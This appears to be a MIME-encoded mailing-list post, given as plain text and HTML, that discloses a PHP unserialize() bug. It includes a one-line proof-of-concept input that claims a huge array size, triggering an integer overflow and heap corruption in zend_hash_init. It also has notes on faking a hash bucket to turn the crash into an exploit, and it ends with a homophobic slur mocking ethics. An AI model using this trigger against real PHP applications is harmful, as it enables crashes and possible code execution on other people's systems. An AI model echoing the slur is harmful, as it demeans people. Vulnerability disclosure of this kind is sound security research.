------=_Part_91297_20240413.1161096528744
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

<?

 print_r(unserialize('a:1073741823:{i:0;s:30:"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}'));
?>

in function zend_hash_init() int overflow ( ecalloc() )-> heap overflow
here segfault in zend_hash_find() but it's possible to fake the bucket and
exploit a zend_hash_del_index_or_key
i tried a memory dump , just fake the bucked with the pointer of the
$GLOBALS's bucket but segfault before in memory_shutdown...

don't cry a river :P
ethic is for gayz

------=_Part_91297_20240413.1161096528744
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

&lt;?<br>&nbsp;&nbsp; &nbsp;print_r(unserialize('a:1073741823:{i:0;s:30:&quot;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&quot;}'));<br>?&gt;<br><br>in function zend_hash_init() int overflow ( ecalloc() )-&gt; heap overflow<br>here segfault in zend_hash_find() but it's possible to fake the bucket and exploit a zend_hash_del_index_or_key
<br>i tried a memory dump , just fake the bucked with the pointer of the $GLOBALS's bucket but segfault before in memory_shutdown...<br><br>don't cry a river :P<br>ethic is for gayz<br><br>

------=_Part_91297_20240413.1161096528744--